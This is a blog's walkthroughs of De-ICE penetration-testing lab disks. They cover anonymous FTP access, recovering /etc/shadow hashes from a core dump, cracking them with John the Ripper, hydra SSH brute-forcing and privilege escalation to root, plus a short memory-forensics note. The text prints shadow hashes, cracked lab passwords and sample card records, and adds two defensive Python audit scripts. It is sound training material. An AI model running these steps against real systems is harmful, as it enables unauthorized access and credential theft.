♋...Learn Harder, Keep Humble, Not For The Faint Heart!, Respect Others, Try Harder...♋

Saturday, November 10, 2012

Lab 3: Pentesting on Lab Disk #1.10 v1.0

1. Information Gathering

The first step is gathering information about the target. Here I start by scanning the target to gather information, using nmap.


We found the target's IP address, 192.168.1.110, and several running services: ftp on port 21, ssh on port 22, http on port 80, and ipp on port 631.

2. Service Enumeration
The information gathering step already showed the running services, but I want a description of each service and port, so I run nmap again using <options>:


As the screenshot above shows, nmap describes them as:
port 21   ftp  ==> anonymous login allowed
port 22   ssh  ==> ssh login
port 80   http ==> Apache httpd version 2.2.4
port 631  ipp  ==> provides a standard network protocol for remote printing

3. Vulnerability Assessment
Based on the information gathering and service enumeration above, I found the target system's weak points: ftp, ssh, and http.

- HTTP
Open the target's IP address in a browser and see what is inside.



In the section I marked, there is a description of the system admin and crew, and their email addresses are shown too.

Now I log in to ftp with the user anonymous and the password anonymous:

root@bt:~# ftp 192.168.1.110
Connected to 192.168.1.110.
220 (vsFTPd 2.0.4)
Name (192.168.1.110:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 download
drwxrwxrwx    2 0        0              60 Feb 26  2007 incoming
226 Directory send OK.
ftp> cd download
250 Directory successfully changed.
ftp> ls -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    7 1000     513           160 Mar 15  2007 .
drwxr-xr-x    4 0        0              80 Mar 15  2007 ..
drwxr-xr-x    6 1000     513           340 Mar 15  2007 etc
drwxr-xr-x    4 1000     513           100 Mar 15  2007 opt
drwxr-xr-x   10 1000     513           400 Mar 15  2007 root
drwxr-xr-x    5 1000     513           120 Mar 15  2007 usr
drwxr-xr-x    3 1000     513            80 Mar 15  2007 var
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    6 1000     513           340 Mar 15  2007 .
drwxr-xr-x    7 1000     513           160 Mar 15  2007 ..
drwxr-xr-x    4 1000     513           160 Mar 15  2007 X11
-rw-r--r--    1 1000     513        362436 Mar 03  2007 core
drwxr-xr-x    2 1000     513           100 Mar 15  2007 fonts
-rw-r--r--    1 1000     513           780 Apr 30  2005 hosts
-rw-r--r--    1 1000     513           718 Jul 03  2005 inputrc
-rw-r--r--    1 1000     513          1296 Jun 10  2006 issue
-rw-r--r--    1 1000     513           183 Jun 23  2005 lisarc
-rw-r--r--    1 1000     513            56 Oct 21  2004 localtime
lrwxrwxrwx    1 1000     513            23 Nov 09 14:18 localtime-copied-from -> /usr/share/zoneinfo/GMT
-rw-r--r--    1 1000     513         10289 Dec 31  2003 login.defs
-rw-r--r--    1 1000     513             1 Dec 31  2003 motd-slax
drwxr-xr-x    2 1000     513           100 Mar 15  2007 profile.d
drwxr-xr-x    2 1000     513           220 Mar 15  2007 rc.d
-rw-r--r--    1 1000     513           440 Jul 18  2006 shadow
226 Directory send OK.
ftp> get core
local: core remote: core
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for core (362436 bytes).
226 File send OK.
362436 bytes received in 0.02 secs (18602.1 kB/s)
ftp> exit
421 Timeout.



Above is the process of browsing the ftp directory contents. I found a file named core (see the yellow block); a core file stores core dump data (a process's memory, storage, and debugging dump). I downloaded the core file with the get command (as above), and it is automatically saved in our current directory (root's home).

Check our directory:


And check the contents of the core file:

root@bt:~# strings core
tdxt
CORE
CORE
test.pl
/usr/bin/perl ./test.pl -d
CORE
CORE
FLINUX
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
ocks
CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include
MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man
KDE_MULTIHEAD=false
HZ=100
HOSTNAME=slax.slackware-live.cd
SHELL=/bin/bash
TERM=xterm
GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0
GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc
GS_LIB=/root/.fonts
WINDOWID=25165831
HUSHLOGIN=FALSE
QTDIR=/usr/lib/qt
LC_ALL=C
KDE_FULL_SESSION=true
USER=root
[ ... output truncated ... ]
.gnu.version_d
.text
.note
.eh_frame_hdr
.eh_frame
.dynamic
.useless
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::


At the end of the output is the De-ICE users' password hash line (the contents of /etc/shadow, captured in the dump). We cannot log in with the hashes as they are, because they are hashed, not plaintext passwords.

4. Exploit
After obtaining the password hashes, we have to crack them. Here I use JTR (John the Ripper). For a description of JTR, please visit here.

The password hash line is the last line of the strings output above, with every /etc/shadow entry run together.

We need to filter it, because we only need the users and their password hashes to log in to ssh later. Like this:
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::


OK, we got four users and their hashed passwords.
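The filtering above was done by hand; as an added example (not the original post's code), here is a small Python scanner that does the same job mechanically from the defender's side: it pulls printable runs out of a core-dump image the way strings does, recognises /etc/shadow records by their nine-field shape even when they are run together on one line as in the dump above, and reports which accounts have a hash or an empty password exposed. The core-dump bytes and the hashes are constructed placeholders, and the regex assumes the empty ninth shadow field seen in this dump.

```python
import re
from dataclasses import dataclass

# One shadow record is nine colon-separated fields.  We capture the first eight
# and require the eighth colon; in the dump the empty ninth field means the next
# account name follows immediately, so records are found by shape, not by line.
SHADOW_RECORD = re.compile(
    r"(?P<name>[a-z_][a-z0-9_-]*):"
    r"(?P<hash>\$[^:\s]+|[*!]{1,2}|):"  # crypt hash, locked marker, or empty
    r"(?P<lastchg>\d+):(?P<min>\d*):(?P<max>\d*):"
    r"(?P<warn>\d*):(?P<inactive>\d*):(?P<expire>\d*):"
)

@dataclass
class ShadowRecord:
    name: str
    pw_hash: str
    lastchg: int
    status: str  # "hashed" (secret exposed), "locked", or "empty" (no password)

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Mimic strings(1): runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def classify(pw_hash: str) -> str:
    if pw_hash == "":
        return "empty"
    return "hashed" if pw_hash.startswith("$") else "locked"

def find_shadow_records(text: str) -> list[ShadowRecord]:
    """Recover shadow records from text, newline-separated or run together."""
    return [ShadowRecord(m["name"], m["hash"], int(m["lastchg"]), classify(m["hash"]))
            for m in SHADOW_RECORD.finditer(text)]

def scan_core_for_shadow(data: bytes) -> list[ShadowRecord]:
    """The strings step over a core image, keeping only the shadow records."""
    return [rec for s in extract_strings(data) for rec in find_shadow_records(s)]

def exposed_accounts(records: list[ShadowRecord]) -> list[str]:
    """Accounts whose hash, or lack of a password, the dump gives away."""
    return [r.name for r in records if r.status != "locked"]

# Constructed core-dump fragment: ELF magic, environment strings like those in
# the real dump, then an /etc/shadow copy with placeholder (not real) hashes.
SAMPLE_CORE = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9
    + b"/usr/bin/perl ./test.pl -d\x00"
    + b"MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man\x00"
    + b"HOSTNAME=slax.slackware-live.cd\x00USER=root\x00"
    + b"root:$1$c0nstruc$PLACEHOLDERHASH000000:13574:0:::::"
    + b"bin:*:9797:0:::::sshd:*:9797:0:::::"
    + b"aadams:$1$c0nstruc$PLACEHOLDERHASH111111:13570:0:99999:7:::"
    + b"guest::13570:0:99999:7:::\x00"
)
```

Run over a real core file with scan_core_for_shadow(open(path, "rb").read()); any non-empty result means the dump contains credential material and should be handled like the shadow file itself.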

Next is cracking with John the Ripper. Before we crack, we must have a wordlist for JTR to use as a dictionary.

Now open John the Ripper on your BackTrack at /pentest/passwords/john.
To see the usage, you can type john.


Now start cracking; this process may take a long time depending on your computer's specification :D


Above, we successfully cracked the passwords and found three users' passwords:
Complexity       (root)
Diatomaceous     (ccoffee)
Zymurgy          (bbanter)

After that, try logging in to ssh. I did not take a screenshot of this because it is too long, so I copied it from Konsole.

I log in as user bbanter:
root@bt:~# ssh bbanter@192.168.1.110
bbanter@192.168.1.110's password: ********
Linux 2.6.16.
bbanter@slax:~$
Then switch to root (highest privilege):
bbanter@slax:~$ su
Password: **********
root@slax:/home/bbanter# 
OMG!! Now I am root on the system :D

What do you do after you successfully get root? It's up to you :D

Below is what I did, namely looking around at the contents of the system:
root@slax:/home/bbanter# ls
root@slax:/home/bbanter# cd /home/
root@slax:/home# 
root@slax:/home# ls
aadams  bbanter  ccoffee  ftp  root
root@slax:/home# cd root/ 
root@slax:/home/root# ls -lh
total 0
root@slax:/home/root# ls
root@slax:/home/root# ls -a
.  ..  .save  .screenrc
root@slax:/home/root# cd .screenrc 
bash: cd: .screenrc: Not a directory
root@slax:/home/root# cat .screenrc 
#
# Example of a user's .screenrc file
#

# This is how one can set a reattach password:
# password ODSJQf.4IJN7E    # "1234"

# no annoying audible bell, please
vbell on

# detach on hangup
autodetach on

# don't display the copyright page
startup_message off

# emulate .logout message
pow_detach_msg "Screen session of \$LOGNAME \$:cr:\$:nl:ended."

# advertise hardstatus support to $TERMCAP
# termcapinfo  * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'

# make the shell in every window a login shell
#shell -$SHELL

# autoaka testing
# shellaka '> |tcsh'
# shellaka '$ |sh'

# set every new windows hardstatus line to somenthing descriptive
# defhstatus "screen: ^En (^Et)"

defscrollback 1000

# don't kill window after the process died
# zombie "^["

# enable support for the "alternate screen" capability in all windows
# altscreen on

################
#
# xterm tweaks
#

#xterm understands both im/ic and doesn't have a status line.
#Note: Do not specify im and ic in the real termcap/info file as
#some programs (e.g. vi) will not work anymore.
termcap  xterm hs@:cs=\E[%i%d;%dr:im=\E[4h:ei=\E[4l
terminfo xterm hs@:cs=\E[%i%p1%d;%p2%dr:im=\E[4h:ei=\E[4l

#80/132 column switching must be enabled for ^AW to work
#change init sequence to not switch width
termcapinfo  xterm Z0=\E[?3h:Z1=\E[?3l:is=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;4;6l

# Make the output buffer large for (fast) xterms.
#termcapinfo xterm* OL=10000
termcapinfo xterm* OL=100

# tell screen that xterm can switch to dark background and has function
# keys.
termcapinfo xterm 'VR=\E[?5h:VN=\E[?5l'
termcapinfo xterm 'k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~'
termcapinfo xterm 'kh=\EOH:kI=\E[2~:kD=\E[3~:kH=\EOF:kP=\E[5~:kN=\E[6~'

# special xterm hardstatus: use the window title.
termcapinfo xterm 'hs:ts=\E]2;:fs=\007:ds=\E]2;screen\007'

#terminfo xterm 'vb=\E[?5h$<200/>\E[?5l'
termcapinfo xterm 'vi=\E[?25l:ve=\E[34h\E[?25h:vs=\E[34l'

# emulate part of the 'K' charset
termcapinfo   xterm 'XC=K%,%\E(B,[\304,\\\\\326,]\334,{\344,|\366,}\374,~\337'

# xterm-52 tweaks:
# - uses background color for delete operations
termcapinfo xterm* be

################
#
# wyse terminals
#

#wyse-75-42 must have flow control (xo = "terminal uses xon/xoff")
#essential to have it here, as this is a slow terminal.
termcapinfo wy75-42 xo:hs@

# New termcap sequences for cursor application mode.
termcapinfo wy* CS=\E[?1h:CE=\E[?1l:vi=\E[?25l:ve=\E[?25h:VR=\E[?5h:VN=\E[?5l:cb=\E[1K:CD=\E[1J

################
#
# other terminals
#

# make hp700 termcap/info better
termcapinfo  hp700 'Z0=\E[?3h:Z1=\E[?3l:hs:ts=\E[62"p\E[0$~\E[2$~\E[1$}:fs=\E[0}\E[61"p:ds=\E[62"p\E[1$~\E[61"p:ic@'

# Extend the vt100 desciption by some sequences.
termcap  vt100* ms:AL=\E[%dL:DL=\E[%dM:UP=\E[%dA:DO=\E[%dB:LE=\E[%dD:RI=\E[%dC
terminfo vt100* ms:AL=\E[%p1%dL:DL=\E[%p1%dM:UP=\E[%p1%dA:DO=\E[%p1%dB:LE=\E[%p1%dD:RI=\E[%p1%dC
termcapinfo linux C8
# old rxvt versions also need this
# termcapinfo rxvt C8


################
#
# keybindings
#

#remove some stupid / dangerous key bindings
bind k
bind ^k
bind .
bind ^\
bind \\
bind ^h
bind h
#make them better
bind 'K' kill
bind 'I' login on
bind 'O' login off
bind '}' history

# Yet another hack:
# Prepend/append register [/] to the paste if ^a^] is pressed.
# This lets me have autoindent mode in vi.
register [ "\033:se noai\015a"
register ] "\033:se ai\015a"
bind ^] paste [.]

################
#
# default windows
#

# screen -t local 0
# screen -t mail 1 mutt
# screen -t 40 2 rlogin server

# caption always "%3n %t%? @%u%?%? [%h]%?%=%c"
# hardstatus alwaysignore
# hardstatus alwayslastline "%Lw"

# bind = resize =
# bind + resize +1
# bind - resize -1
# bind _ resize max
#
# defnonblock 1
# blankerprg rain -d 100
# idle 30 blanker
root@slax:/home/root# ls -a
.  ..  .save  .screenrc
root@slax:/home/root# cat .save/
cat: .save/: Is a directory
root@slax:/home/root# cd .save/
root@slax:/home/root/.save# ls
copy.sh  customer_account.csv  customer_account.csv.enc
root@slax:/home/root/.save# cat cus
customer_account.csv      customer_account.csv.enc  
root@slax:/home/root/.save# cat customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save# 

Hehe.. I found the customer account records shown above :D

Finish ^^



Lab 2: Pentesting on Lab Disk #1.100 v1.0

1. Information Gathering and Service Enumeration
The first step in pentesting is gathering information about the target. Here I gather information by scanning with nmap.


Above, two IP addresses are shown: 192.168.1.12 (our IP address) and 192.168.1.100 (the target's IP address). The services running on the target system are also shown.

If you are unsure about the running services, you can see their descriptions by scanning again with other options, like below:


Above we can see descriptions of the running services and which ports are open or closed:

20/tcp   closed ftp-data => this port is closed
21/tcp   open   ftp      => ftp server is open
22/tcp   open   ssh      => shows the ssh version (OpenSSH 4.3)
25/tcp   open   smtp     => smtp is used by email clients to send outgoing mail on port 25
80/tcp   open   http     => shows the apache version (Apache httpd 2.0.55 ((Unix) PHP/5.1.2))
110/tcp  open   pop3     => pop3 is an e-mail protocol, like smtp
143/tcp  open   imap     => standard protocol to access/store e-mail on the server
443/tcp  closed https    => this port is closed

3. Vulnerability Assessment
Based on the information gathering and service enumeration, we found the weaknesses shown above. Here I can use http and ssh.
To access http, we just open the target's IP address in a browser and look at the content.



As seen above, at the bottom of the page there is a list of names and email addresses.

4. Exploit
From the list of usernames and emails we can brute-force the ssh service. But first we must crack the passwords for those usernames. So put the usernames in a text editor, like below.



Here I am using hydra. Before starting to crack we must have a wordlist. You can get a wordlist from the pentest directory or search for one on the web. Here I use a wordlist from the pentest directory.


root@bt:~# cd /pentest/passwords/wordlists/
root@bt:/pentest/passwords/wordlists# ls
darkc0de.lst  rockyou.txt

I use darkc0de.lst, and then I filtered the wordlist's contents, because it is very large while the usernames we will crack are just a few. This is so the cracking is not too heavy, considering my system is not well equipped for it.

Let's crack using hydra.


OK, now we have a username and password to log in.

Let's log in using the username bbanter and the password bbanter, as in the result above.
root@bt:~# ssh bbanter@192.168.1.100
bbanter@192.168.56.101's password:
Linux 2.6.16.

Above, we successfully logged in to ssh, but not as root. Then check /etc/passwd to look for other users:

bbanter@slax:~$ cat /etc/passwd 
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

Then check /etc/shadow:
bbanter@slax:~$ cat /etc/shadow 
cat: /etc/shadow: Permission denied
bbanter@slax:~$ 

Hufft.. we have a permissions problem; it turns out bbanter does not have higher access. But at the bottom of the /etc/passwd output we find three usernames (aadams, bbanter, ccoffee).
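The listing above is what tells us which accounts are worth attention; as an added example (not from the original post), here is a Python audit of a subset of that /etc/passwd output, read the way a reviewer would: which accounts are ordinary users, which service accounts were given an interactive shell, which rely on the /bin/sh default for an empty shell field, and which share GID 0 or /root. Whether any of them can actually authenticate is decided by /etc/shadow, which bbanter could not read; the LOGIN_SHELLS set and the finding names are this example's own.

```python
from dataclasses import dataclass

# Shells that give an interactive session; this set is the example's own choice.
LOGIN_SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/zsh", "/bin/ksh"}

@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str
    shell_explicit: bool  # False when the field was empty (passwd(5): /bin/sh)

def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse /etc/passwd text; an empty shell field is recorded as /bin/sh."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), home,
                                   shell or "/bin/sh", bool(shell)))
    return entries

def audit_passwd(entries: list[PasswdEntry]) -> dict[str, list[str]]:
    """Group accounts the way a reviewer reads a passwd listing."""
    return {
        # uid >= 1000: ordinary users added by an administrator
        "human_users": [e.name for e in entries if e.uid >= 1000],
        # service accounts that were nevertheless given an interactive shell
        "service_with_shell": [e.name for e in entries
                               if 0 < e.uid < 1000 and e.shell_explicit
                               and e.shell in LOGIN_SHELLS],
        # accounts relying on the /bin/sh default; only /etc/shadow decides
        # whether they can actually authenticate
        "default_shell": [e.name for e in entries if not e.shell_explicit],
        "uid0": [e.name for e in entries if e.uid == 0],
        "gid0_not_root": [e.name for e in entries if e.gid == 0 and e.uid != 0],
        "home_is_root": [e.name for e in entries if e.home == "/root" and e.uid != 0],
    }

# Subset of the /etc/passwd listing shown above (copied from the page).
SAMPLE_PASSWD = """\
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
sync:x:5:0:sync:/sbin:/bin/sync
operator:x:11:0:operator:/root:/bin/bash
ftp:x:14:50::/home/ftp:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
"""

if __name__ == "__main__":
    for finding, names in audit_passwd(parse_passwd(SAMPLE_PASSWD)).items():
        print(f"{finding:<20} {', '.join(names) or '-'}")
```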

Delete every username in userlist.txt except those listed in /etc/passwd.
Next, crack again with the list of users found in /etc/passwd. Here I use hydra-gtk (the GUI) because it is simpler :D


Yes, we found the password of user aadams.

Log in to ssh as user aadams, then check /etc/passwd.


Then check /etc/shadow using the sudo command, like below:


OK, now we have found the password hashes.

Then crack the password hashes using John the Ripper, like below.


Haha.. we found the root password; gaining the highest privilege was easier than expected.

Let's login...


Finished; now we are root and the highest privilege has been gained :D

Alhamdulillah ^^

Saturday, November 3, 2012

Memory Forensic Analysis

This time, I will write about what I learned this afternoon at camp, namely memory forensics.

Let's.. start!

First, I scan the target using nmap, like below:


From here, I go straight to exploiting the system. I exploit the application running on the Windows system, namely BigAnt Server on port 6660. You can look up the exploit on exploit-db.

Now run the exploit and connect to the system using telnet, as in the following screenshot:


Then list the running processes and their services with the command tasklist /svc (on the Windows system):


Above is the list of running processes.

Next is capturing the memory.
Open the AccessData FTK application on Windows.


Then start capturing the memory:


Save memdump.mem to /var/www/ptk.

A. Analyze using PTK
After that, open the PTK tool from Applications => Forensics => RAM Forensic Tools => ptk.
It will show you something like this:

Enter the username and password that were configured. If you have not yet configured PTK, please configure it first! You can see the configuration here.

Then create a new case and enter whatever case name you want.


After that, just fill in what is required..

Now select pslist and then click start, as in the following screenshot:


Below is the pslist result from memory.

NOTE: you can choose from the drop-down menu; there are more options you can use.

B. Using the Volatility command
First go to the tool's directory at /pentest/forensics/volatility/.
There are many options you can use; to list them, type the command:
# ./vol.py -h

Now check the sockets using the command in the following screenshot:


Or check the connections:


Please read the help if you need more options for analysis. Thanks..